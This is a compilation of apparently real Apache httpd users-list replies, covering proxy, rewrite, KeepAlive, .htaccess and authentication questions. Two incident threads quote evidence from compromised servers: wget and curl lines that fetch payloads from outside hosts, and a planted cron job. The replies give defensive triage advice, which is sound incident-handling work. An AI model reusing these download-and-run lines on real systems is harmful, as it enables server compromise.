Re: [users@httpd] Proxy for TLS connection

[Jeroen Geilman]

On 2011-08-02 23:17, Ruiyuan Jiang wrote:

Do not hijack other peoples' threads or topics. Just start your own.


Hi, I have a Apache reverse proxy server for both multiple http and https 
connection setup (v2.2.19).



Right now there is a request to proxy TLS connection which is not on port 443. 
Does Apache reverse proxy server can accomplish that? Thanks.


Why would the port matter



Ruiyuan



This message (including any attachments) is intended
solely for the specific individual(s) or entity(ies) named
above, and may contain legally privileged and
confidential information. If you are not the intended
recipient, please notify the sender immediately by
replying to this message and then delete it.
Any disclosure, copying, or distribution of this message,
or the taking of any action based on it, by other than the
intended recipient, is strictly prohibited.


I hereby violate everything you state and keep the message to sell to 
the russians for lotsamonies.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] https redirection

[Jeroen Geilman]

On 2011-08-04 11:35, Ashwin Kesavan wrote:

Jeroen Geilman wrote:

On 2011-07-30 08:28, vishesh kumar wrote:

Hi Members

suppose i have a site https://abc.com and i want if anyone write 
https://abc.com/xyz.com , it should redirected to https://xyz.com 
which is one same server.


Redirect Permanent /xyz.com/ https://xyz.com/

Server wide certificate installed on server . 


No.
If the domains hosted on this server are not in the same parent zone 
(as you have just shown) you cannot use one certificate for both 
domains.




Look at the mod_rewrite and the directive RedirectPermanent in httpd 
documentation to know how to use the above two to achieve the 
objective you want. It is pretty simple and starightforward. I have 
done that many times myself. I want you8 to learn that instead of 
spoon feeding you. Look up for the above two keyword in httpd doc site 
and you will have all that is required to do it. Please have the 
habbit of searching on any search engine like google for example to 
know how to do something before askign here. Ask only if that didnt 
help. Please read up "how to ask smart questions" by esr in internet 
and enlighten yourself.


HTH



And you're telling me this because ?

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Chrome 300 Problem

[Jeroen Geilman]

On 2011-08-06 20:17, Michael D. Berger wrote:

Running:
# rpm -q httpd
httpd-2.2.3-31.el5.centos.4
On:
# uname -a
Linux mbrc20 2.6.18-164.15.1.el5 #1 SMP Wed Mar 17 11:37:14 EDT 2010 i686
athlon i386 GNU/Linux

Accessing a directory:
www.myplace.net/here/there/
where both "here" and "there" require httpd access, while
www.myplace.net/ does not,

Using Chrome, the user gets a "300 Multiple Choices" response,
(with no choices offered) while when using Firefox, there is
no problem, and a proper login is requested.

I note that the directory "there" contains numerous subdirectories,
but only one other file: there/there.html .


http://httpd.apache.org/docs/current/content-negotiation.html



Any suggestions?
Thanks,
Mike.


-
The official User-To-User support forum of the Apache HTTP Server Project.
Seehttp://httpd.apache.org/userslist.html>  for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
"   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Forwarding request to internal server

[Jeroen Geilman]

On 2011-08-12 02:42, Ahmad Pakhri Yahya wrote:


Hi,



Hi, don't hijack other peoples' threads.

I'm new to apache. I'm trying to forward request from a server located 
in DMZ serving request from external IP to a tomcat server residing 
inside an internal network. How do I setup my apache/httpd config so 
that the request would go the internal IP.


I would also, if possible, forward to multiple servers internally 
running the same application. Like a load balancer service, which 
serve external request to multiple internal tomcat server.


I would appreciate if some can show me how to setup the environment on 
the external/DMZ server so that all request will go the multiple 
internal servers.


 
External/dmz server


   
 |


  
/  \


   
/\


   
Tomcat 1  Tomcat2




Look at mod_proxy_balancer.

It can do everything you want.


--
J.

Re: [users@httpd] Modular .htaccess files

[Jeroen Geilman]

On 2011-08-15 12:34, lists.sebast...@abwesend.de wrote:

Hi,

I have an idea on .htaccess files or rather a tiny feature request. :) Before I post it 
to the bugzilla system as a "real" feature request, I wanted to put the idea up 
for discussion. ;) By the way, Apache is a really great piece of software and I like to 
use it! ;)

But first of all one more thing: Yes, I know that .htaccess is only the second best 
alternative and people should rather use httpd.conf BUT in my opinion there are reasons 
"pro" .htaccess (for example, if you can't change the server configuration).


That is the only reason.


IDEA: It was a great thing, if one could cascade/include .htaccess files 
(Include .htaccess-2) or make Apache parse more than one .htaccess file per 
directory (.htaccess-botrestriction, .htaccess-legacyurlrewrite, ...). A 
modular approach for .htaccess files could provide an increased flexibility and 
an improved manageability.


And it would dump your performance even further down the toilet.


Scenario 1:
---
You have big .htaccess files containing anti-bot ip restrictions, legacy URL 
rewrite rules, SEO URL rewrite rules etc.


That would be unwise. Global IP restrictions are under the purview of 
the administrator and should really go in httpd.conf, or be enforced by 
a firewall.
I furthermore suspect you have no idea what an "anti-bot IP restriction" 
actually means, since your professed goal - to get noticed by search 
engines - requires you to very much let bots access your web site.



- Restrict certain IP ranges from accessing your folders/forum/blog/whatever. 
This can be done through .htaccess.


But should be done in httpd.conf whenever possible.


- "Cool URIs don't change" [1]. We all know that. But sometimes you have to change your 
directory structure (e.g. new CMS software) and then it's good to keep the old addresses working 
through "HTTP/301 Moved Permanently" forwardings. This can be done through .htaccess.


But should be done in httpd.conf whenever possible.


- Everybody seems to love SEO URLs. Users and decision makers demand them, 
although there are people who say there's no use in using them.



So if you want to meet the demand, you need to offer these 
/products/my-product-123.html addresses. This can be done through .htaccess.


But should not be done at all.


If one puts all these things into one big file, it can become confusing and 
hard to maintain. It would be easier to keep track of these things if you could 
do something like this:

[Content of .htaccess]
# Some common directives ...
# ...
# Include more .htaccess files:
Include .htaccess-botrestrictions
Include .htaccess-keepalivelegacyurls
Include .htaccess-fancyseourls


httpd.conf fully supports this.


Scenario 2:
---
You develop some web applications locally (local LAMP server/developer machine) 
and often deploy the changes made to your productive environment (virtual 
server on the net, cloud hosting, dedicated server, ...). I have a few of these 
projects and the project files are the same online and offline, apart from one 
config.inc.php (database configuration, paths etc.) and the .htaccess file. I 
exclude the server-specific config.inc.php from synchronizing. So I can just 
upload all the other files without problems (WinSCP or sth. like this). ALL the 
other files? No, there's one file that needs to be merged manually!! :D It's 
the .htaccess file. I can't just overwrite the version on the production server 
with my local file version because there are few lines that need to be 
different. So I have to edit this file manually and be very very careful not to 
put in the local (==wrong) paths on the server.
It would make things much easier, if you could keep more than one .htaccess file. I 
could use one .htaccess-serverspecific, which could be excluded from sync, and one 
.htaccess-common, which could be overwritten (local dev machine ->>  web 
server) airly.


And it would be even more easy when you put the static configuration in 
httpd.conf, and ONLY put the configuration in htaccess files that you 
KNOW should be applied to one or the other disparate environments.
This enables you to keep the DEV and PROD htaccess files clean and 
understandable - each applies only to its own environment.


In fact, if you combine the above comment with this requirement, one 
might posit that the best solution is to maintain different Include 
files for DEV and PROD, and not to bother with htaccess at all.


Re-creating the entire "config" through htaccess files is just stupid.



These are only two ideas on how these feature could be useful to users.


My 2 ideas on how to do that:
---
1) Allow Include in context .htaccess. See [2].
2) Allow Apache to read more than one .htaccess files per directory (e.g. all 
files with a certain prefix, for example .htaccess-([a-z]+) )


Do you think there might be a chance to suggest this topic to the developers? 
At least *I* would like to have these feature[s] in Apache h

Re: [users@httpd] Modular .htaccess files

[Jeroen Geilman]

On 2011-08-15 16:37, Pete Houston wrote:

On Mon, Aug 15, 2011 at 10:16:29AM -0400, Ben Timby wrote:

In the above way, the administrator could delegate control of portions
of the configuration to a user without the overhead of an .htaccess
file. Also, you could include a file which in turn includes other
files. Thus, the administrator could delegate via httpd.conf a config
file to the user which in turn could delegate to a set of files. This
would give you localized management in a set of files.

There are two problems with this which I can see.

Firstly, from the web server manager's point of view this is a bad idea,
because all it would take would be for the user to construct a conf file
with a syntax error and the whole server is taken down. Too much of a
risk on a shared server.

Secondly, from the user's point of view, they make their change to the
conf file, but it will only become active when the server is restarted
to pick up the changes, so probably daily or worse weekly. With a
.htaccess file the changes are instantaneous.


True, as far as it goes.

However, while there is no way to limit what an Include file contains, 
you can restrict what users are allowed to put in htaccess files.
This coincides with what you're describing in that changes to Include 
files should be tested before restarting apache with apachectl 
configtest, and disabling or (re)moving offending Include files.

This would be the responsibility of the server admin.
The use of htaccess files can be quite wide-ranging but it doesn't have 
to be, and the depth of manipulation the OP wanted to achieve is best 
split up between these two mechanisms.


Moreover, he obviously wasn't allowing end-users to manipulate htaccess 
files at all, as he explicitly stated this was a fix for an 
"inconvenience" in configuration differences between development and 
production.
Both of these are the server admin's responsibility, and one assumes 
that the server admin is paying attention when deploying new 
configurations to production.




So, while it's nice in theory, there are practicalities which mean that
it is unlikely to happen in a shared server scenario.


In a shared HOSTING environment, you're absolutely correct.
The OPs stated goal had nothing to do with shared hosting, although he 
generalized the request to extend that far.


Perhaps I should have made more plain that I am in no way claiming this 
feature - or any feature - should not be implemented, or discussed; I am 
not an apache developer so I wouldn't have much to say about it one way 
or the other.
That's not at all my point - my point was that HIS goal does not need 
any kind of new feature implementation.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Proxy´ing a remote site

[Jeroen Geilman]

On 2011-08-16 09:23, Søren Schimkat wrote:

Hi Guys

I would like to make a remote website appear as existing on a local 
virtual host, but I'm having trouble with understandig how to do it. 
Virtual hosting i working just fine, but getting the remote site into 
the local space is just killing me.


What I need to do is to have www.remote.com til appear as www.local.com.


mod_proxy_http will do this just fine.

Configure Proxypass and ProxypassReverse as documented.

The remote site contains some fully qualified links and references to 
images like this: http://www.remote.com/somestuf/page2.htm"; 
title="Page 2">http://www.remote.com/images/page2.gif";> 
..  that would need to be rewritten.


That is not possible with mod_proxy.

There is a third-party module that does just that however: mod_proxy_html.

You can find it here: http://apache.webthing.com/mod_proxy_html/



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] RE: KeepAlive setting under heavy load

[Jeroen Geilman]

On 2011-08-17 16:55, Pratte, Gil wrote:


I left out one detail - Apache HTTP is only being used as a reverse proxy.



Then you want keepalive on and set high.
Persistent connections to your backend are obviously beneficial.

This depends on how many backend servers you have, but even with, say, 
20 servers, and the default of 256 threads, this means you have 12 
persistent connections per backend server.
If the distribution is not equal(-ish), or worse, random, this will 
backfire.



I have read conflicting reports regarding the KeepAlive setting. Under 
load the website has hundreds to thousands of users logged in at any 
given time.




Web servers do not log anything in.


I am in the process of tuning it for performance under load.



You need to calculate average and burst requests per time period, and 
correlate that with your maximum client concurrency.

(You also need average time per request for this).

Enable and study server-status for detailed usage info.

My question is: Should I set KeepAlive to On or Off for a website 
under heavy load?




Too many variables.
Establish baselines, study usage patterns, and determine optimal settings.

--
J.

Re: [users@httpd] number of connection on Windows Apache

[Jeroen Geilman]

On 2011-08-17 22:51, go1...@mailnew.com wrote:

Hi, I am using Apache 2.2.17 on Windows Server. To experiment with the
limit of number of simultaneous connection, I used the directive
ThreadsPerChild set the number to 1. So I am only supposed to be able to
have one connection at a time. But I am surprised to see I can use two
curl clients to download files at the same time. I wonder how to explain
this.

The following is my setting.

 ThreadsPerChild  1



And how many children are running ?

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Setting KeepAlive on for forward proxy

[Jeroen Geilman]

On 2011-08-18 17:08, Edoardo Tirtarahardja wrote:

Hi,

I read from mod_proxy description in Apache 2.2 that the default worker
does not use the HTTP Keep-Alive.

Is there a way how to enable it for forward proxy configuration?


You mean, from apache working as a forward proxy to the remote origin 
server?

Can you imagine how bad that would be ?


  I tried
to set the 'keepalive' parameter in 'ProxyPass' directive it doesn't work.
I think ProxyPass is more for reverse proxy, rather than forward proxy.


As documented, ProxyPass is ONLY for reverse (i.e. known-origin) proxies.



Setting it in 'Proxy' directive also doesn't work.

Even I can make it work, those 'ProxyPass'&  'Proxy' requires an absolute
URL, while I want to enable it for ALL request.


Um. So use /.


Please help.

BR //Edo



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Setting KeepAlive on for forward proxy

[Jeroen Geilman]

On 2011-08-18 18:09, Edoardo Tirtarahardja wrote:

On 2011-08-18 11:26,Jeroen Geilman wrote:

On 2011-08-18 17:08, Edoardo Tirtarahardja wrote:

Hi,

I read from mod_proxy description in Apache 2.2 that the default worker
does not use the HTTP Keep-Alive.

Is there a way how to enable it for forward proxy configuration?

You mean, from apache working as a forward proxy to the remote origin
server?
Can you imagine how bad that would be ?

Well, this is a very isolated forward proxy within a very small test
network. The reason is when I'm hitting our intranet site,



You should be using Proxypass, as you apparently need a reverse proxy.



it returns HTTP
403 as it requires NTLM authentication. However the apache forward proxy
close the connection (TCP SYN)


FIN


  when delivering this HTTP 403 response to
the client, causing the client to immediately display the HTTP 403.

 From a computer that directly connected to our corp. LAN, I can see that
if the TCP connection is kept alive, then the browser will re-send the
request with NTLM authentication negotiation and then it works.

I"m new in apache server, but I have done quite some google search and it
seems apache does not have module to be NTLM proxy, i.e. perform NTLM
auth. on the client behalf. The module for NTLM if I understand it
correctly, is only to be used in reverse proxy or to authenticate the
windows client.


So pass on the authentication to the proxy...
ProxyPass supports this (and does it by default AFAIK)



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] My RewriteRule seems to be ignored

[Jeroen Geilman]

On 2011-08-22 23:55, Hilco Wijbenga wrote:


You nailed it. All those Rewrite* options need to be in the virtual
host. Then it works.

This is surprising. I had assumed that anything outside of a virtual
host was a global setting and the virtual host settings overrode those
global settings where appropriate.


Except that RewriteEngine ON is NOT inherited.
It must occur anew in every vhost the global rules need to apply to.
As documented...


Can you recommend anything to read that handles such basic concepts?
The Apache docs are extensive but clearly you need to have a certain
foundation of basic Apache knowledge.


No, it's all in the official documentation.
Start at the main portal and read the various howtos and guides before 
diving into specific reference sections:


http://httpd.apache.org/docs/2.2/




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] [mod_rewrite] How to *not* log certain rules?

[Jeroen Geilman]

On 2011-08-23 20:30, Hilco Wijbenga wrote:

Hi all,

I have Vuze (bittorrent) running which sends out /announce and /scrape
requests every 10 seconds or so. I managed to avoid logging them in
the regular logs using

SetEnvIf Request_URI "^/announce|/scrape$" do-not-log
CustomLog /var/log/apache2/access.log common env=!do-not-log

  but they still show up in my rewrite.log.


So disable the rewritelog.

It's meant for debugging purposes, not to run on a production system.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Could Apache login support CAPTCHA and lockout?

[Jeroen Geilman]

On 2011-10-04 14:44, Neal Rhodes wrote:
We have bunches of web applications which use the regular Apache login 
protection, 


Do you mean HTTP Basic Auth, as defined in RFC 2616 ?


and they won't run unless REMOTE_USER is set by the Apache login.


require valid-user



require valid-user


AuthName O-Visitor
AuthUserFile /usr/appl/cgi/.htpasswd

AuthType Basic




Yes, this is HTTP Basic AUTH.
It says so right there.


Looking at improving security, it would seem that it would be much 
harder to conduct brute-force attacks on these systems if we could 
configure Apache login to do two things:


You can't.
There is no "login", just an Authorization: header which has to be sent 
for every page that requires it.



A. Present the CAPTCHA style validation prompt as part of the
login, to make it difficult for scripted attacks to proceed;
B. Lockout an individual username in the .htpasswd file after X
failed login attempts.



Actual login-ness (a state of logged in being different from a state of 
not being logged in) must be achieved through non-HTTP means, possibly 
supported by HTTP features such as cookies.



--
J.

Re: [users@httpd] Apache2 sporadically not interpreting php code

[Jeroen Geilman]

On 2011-10-26 10:06, dubbelpunt wrote:

My httpdserver is sporadically not interpreting some of my php code.


Apache never, ever interprets PHP code.
You are talking about mod_php, which is a third-party module.

That said, you are also using APC and mod_python.

I suggest you look into that.


Apache version: 2.2.8


That is quite old.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Possible hack attempt

[Jeroen Geilman]

On 2011-10-28 21:46, Gary Smith wrote:

I was tasked on tracking down the cause of a perl process that is hanging on a 
client server.  The server is opensuse, pretty much out of the box, patched 
pretty current.  Anyway, below is the first log entry where it looks like 
someone attempted to run a perl script.  It also appears that a file was 
somehow saved.  Since I see that there is a url in it, I figured I'd ask others 
if they have seen this attack vector recently and what resolution path I might 
take.

[Wed Sep 21 12:30:09 2011] [notice] Apache/2.2.15 (Linux/SUSE) mod_ssl/2.2.15 
OpenSSL/1.0.0 PHP/5.3.3 configured -- resuming normal operations
perl: no process found
--2011-09-22 12:58:42--  http://joytalk.byethost4.com/uau
Resolving joytalk.byethost4.com... 209.190.24.4
Connecting to joytalk.byethost4.com|209.190.24.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `uau'

  0K .. .. . 185K=0.2s

2011-09-22 12:58:43 (185 KB/s) - `uau' saved [29702]

   % Total% Received % Xferd  Average Speed   TimeTime Time  Current
  Dload  Upload   Total   SpentLeft  Speed
100 297020 297020 0  73064  0 --:--:-- --:--:-- --:--:-- 91390
--2011-10-03 12:32:31--  http://91.205.74.14/.xal/.ICE-un1x
Connecting to 91.205.74.14:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29710 (29K) [text/plain]
Saving to: `.ICE-un1x'

  0K .. .. .   100% 54.4K=0.5s

2011-10-03 12:32:31 (54.4 KB/s) - `.ICE-un1x' saved [29710/29710]



So go and see what is in those files.

Since they were kind enough to timestamp the download, you can correlate 
this with the access log and see the exact exploit used.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] apache 2.2.16 deadly slow

[Jeroen Geilman]

On 2011-11-11 06:00, J. Bakshi wrote:

On Thu, 10 Nov 2011 02:05:44 +0100
Bostjan Skufca  wrote:


Seconded:)

b.

Dear list,

To be confirmed I have installed debian squeeze on a new server having 8GB RAM
and with i5 processors. Then installed apache2, php5, mysql etc.

Have not done any tweak on any configuration  and surprisingly the apache
response is very very slow


That's so uninformative as to be useless - as can be deduced from the 
handful of guesses you received about it.


Please investigate properly and report actual facts: what does "slow" 
mean, under what conditions, what requests are done, what code is 
running, what 3rd party modules have you enabled, what does the system 
load look like when you start apache, after 10 minutes, after an hour ?


Don't expect us to do your work for you.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Invalid URI in request OPTIONS * HTTP/1.0

[Jeroen Geilman]

On 01/04/2012 12:36 PM, Szőts Ákos wrote:

Hi All,

There's a frequent error message in my Apache error_log (v2.2.21 under
openSUSE 12.1):
"Invalid URI in request OPTIONS * HTTP/1.0"

I know this is an internal dummy connection to test if the server is alive
or not. But every time, Apache tries to connect to itself, it writes
instead of the error log.

Here is the full request:
OPTIONS * HTTP/1.0
User-Agent: Apache (internal dummy connection)

Response:
HTTP/1.1 400 Bad Request
Vary: accept-language,accept-charset,User-Agent
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Tue, 03 Jan 2012 19:31:04 GMT

Here is the full "debug" log:
[error] [client 194.38.104.110] Invalid URI in request OPTIONS * HTTP/1.0
[debug] mod_headers.c(756): headers: ap_headers_output_filter()
[debug] mod_headers.c(756): headers: ap_headers_output_filter()
[debug] mod_headers.c(756): headers: ap_headers_output_filter()
[debug] mod_headers.c(756): headers: ap_headers_output_filter()
[error] [client 194.38.104.110] ModSecurity: Warning. String match "Invalid
URI in request" at WEBSERVER_ERROR_LOG.

I tried to telnet to my server on port 80, and when I write "OPTIONS *", I
get a 400 error, but when I write "OPTIONS /", I got 200 OK.
RFC says the * is acceptable, so I don't understand why the error.



An internal dummy connection will originate from localhost (127.0.0.1), 
not 194.138.104.110:


[error] [client 194.38.104.110] ModSecurity: Warning. String match "Invalid 
URI in request" at WEBSERVER_ERROR_LOG.


As to the OPTIONS * request failing - make sure there are no hidden 
rewrite rules or other URI mangling going on.




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Invalid URI in request OPTIONS * HTTP/1.0

[Jeroen Geilman]

On 01/06/2012 10:23 AM, Szőts Ákos wrote:

No, I don't think so; ModSecurity just get triggered because something in
the error_log.

"As to the OPTIONS * request failing - make sure there are no hidden
rewrite rules or other URI mangling going on."

Thank you for the tip. Is there any (easy) way to debug which rewrite rules
were applied to a query? The server is in use, so unfortunately I cannot


Enable the rewritelog and see what it says:

RewriteLog /some/location
RewriteLogLevel 1

If RewriteLogLevel 1 does not show you what you need to see, increase it 
until you do see something, but I would advise you not to run at a high 
loglevel for long on a production system, as it will cause a massive 
performance hit.




turn on/off the rules randomly.

Ákos

2012. január 5. 13:49:30 dátummal Igor Cicimov ezt írta:

[error] [client 194.38.104.110] ModSecurity: Warning. String match "Invalid
URI in request" at WEBSERVER_ERROR_LOG.   ModSecurity? Protection against
using * in the URI?



-
The official User-To-User support forum of the Apache HTTP Server Project.
Seehttp://httpd.apache.org/userslist.html>  for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
"   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Is it possible to redirect user to "market://..." URI?

[Jeroen Geilman]

On 2012-01-09 14:08, linux.il wrote:


On my website I should redirect Android users to my application on 
Android Market. What is the optimal way to do this? My first idea was


|RewriteCond %{HTTP_USER_AGENT}  Android [NC]
RewriteRule ^/$ market://details?id=..|


There is no market://details application/system/scheme on your apache 
server - this is a client-side phenomenon.
Issue a 301 Redirect to the above URL - you can put anything in a 
redirect URL.
Convert the above into an explicit redirect by appending [R=301] to the 
RewriteRule.


||


But it doesn't work. Is it doable in Apache?

TIA, Vitaly




--
J.

Re: [users@httpd] Is it possible to redirect user to "market://..." URI?

[Jeroen Geilman]

On 01/10/2012 09:17 AM, linux.il wrote:

On Mon, Jan 9, 2012 at 9:31 PM, Jeroen Geilman  wrote:


On 2012-01-09 14:08, linux.il wrote:

On my website I should redirect Android users to my application on Android Market. 
What is the optimal way to do this? My first dea>>was

   RewriteCond %{HTTP_USER_AGENT}  Android [NC]
   RewriteRule ^/$ market://details?id=..

There is no market://details application/system/scheme on your apache server - 
this is a client-side phenomenon.
Issue a 301 Redirect to the above URL - you can put anything in a redirect URL.
Convert the above into an explicit redirect by appending [R=301] to the 
RewriteRule.

Thank you for suggestion. I replaced 302 to 301 return code, but it
didn't help - browser tries  to open some weird  URL like this:
http://mysite.com/market://details?.



Perhaps mod_rewrite does not support redirecting to a different 
protocol, and assumes your target is relative and appends it to the base 
URI.

You could try to set RewriteBase to / for this scenario.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] attack on apache

[Jeroen Geilman]

On 01/11/2012 08:24 PM, Luisa Ester Navarro wrote:




From: luisa2...@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300



> Date: Mon, 9 Jan 2012 17:30:21 +
> From: tevans...@googlemail.com
> To: users@httpd.apache.org
> Subject: Re: FW: [users@httpd] attack on apache
>
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
>  wrote:
> >
> >
> > 
> >
> > I didn´t have any cronjobs but when I detected the attack I saw 
one  in

> > /var/spool/cron
> >  My logifle says
> > User apache:
> >
> >/var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> >
> >personal crontab deleted: 56 Time(s)
> >
> >personal crontab listed: 1 Time(s)
> >
> >personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
>
> Google tells me that this is output from a cpanel perl script -
> probably a crontab editor. crontabs are not evidence of an attack.
>

> You need to show more details of what you think is happening, and why
> you think it is malicious.
> Cheers

Tom

I think it is an attack because I found this commands running on my 
server (with owner apache)


/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O http://

I also found a folder proc in /var/named/chroot. this folder is the 
same as /proc, is updated with the original /proc and I can't delete.


That is a bind mount, and probably unrelated. It may be necessary to run 
BIND chrooted.




In /var/log/httpd/error_log I see hink like this
sh: del comand no found
sh: xx Permission denied

I need help !



1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this exploit.
3. remove the bad script.


--
J.

Re: [users@httpd] attack on apache

[Jeroen Geilman]

On 01/11/2012 09:10 PM, Jaco Kroon wrote:

On 11/01/12 21:35, Jeroen Geilman wrote:




In /var/log/httpd/error_log I see hink like this
sh: del comand no found
sh: xx Permission denied

I need help !



1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this 
exploit.

3. remove the bad script.
4.  Remount /tmp with noexec,nosuid,nodev to prevent the majority of 
these types of exploits.


Surely you noticed that I did not advise him to turn it back on - at all 
? ;)

But yes, distros that don't protect /tmp suck.


--
J.

Re: [users@httpd] attack on apache

[Jeroen Geilman]

On 01/11/2012 10:10 PM, Jaco Kroon wrote:

On 11/01/12 22:37, Luisa Ester Navarro wrote:




J.
Thanks Jeron:
 any idea how to start researching which is the leaky script
Cheers
Luisa
Hehe, this is where they say, RTFS, or as Jeron suggested, see if you 
can correlate something in the logs.  If apache is still running and 
you happen to have mod_info, it's useful as it at least gives you the 
paths being processed, often the "child script" will hold up the 
processing and you can then spot the script in use in the mod_info 
data, in other cases, it's a wild goose chase.


I think you are referring to the server-status handler provided by 
mod_status, which shows the URIs currently being served if you set the 
gloabl option ExtendedStatus to On.


--
J.

Re: [users@httpd] mod_rewrite access control configuration

[Jeroen Geilman]

On 01/14/2012 09:35 AM, Asplund Marko wrote:

Hi,

I'm using Apache httpd to act as a reverse proxy and I'd like to block
access to all but explicitly listed resources.
I've come up with two possible solutions that i'd like to check with more
experienced mod_rewrite users.

Is there any difference between the two approaches below from performance
or other points of view?
I expect the set of allowed resources to be probably below 30.
I'm also planning on employing other Apache modules in the proxy such as
mod_cache and possibly mod_security.

# method A: one rule with several conditions.
# allow access to resources starting with /foo/, /bar/ or /baz/; block
others
RewriteCond %{REQUEST_URI} ^/foo/ [OR]
RewriteCond %{REQUEST_URI} ^/bar/ [OR]
RewriteCond %{REQUEST_URI} ^/baz/
RewriteRule  ^ - [P]

RewriteRule ^ - [F]

# method B, multiple rules without conditions

# allow access to resources starting with /foo/, /bar/ or /baz/; block
others
RewriteRule ^/foo/ - [P]
RewriteRule ^/bar/ - [P]
RewriteRule ^/baz/ - [P]
RewriteRule ^ - [F]


All requests are currently proxied to the backend server simply using:


ProxyPass / ajp://127.0.0.1:8009/




Rewrite and Proxypass are not related.
Why exactly are you using RewriteRules for this ?

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
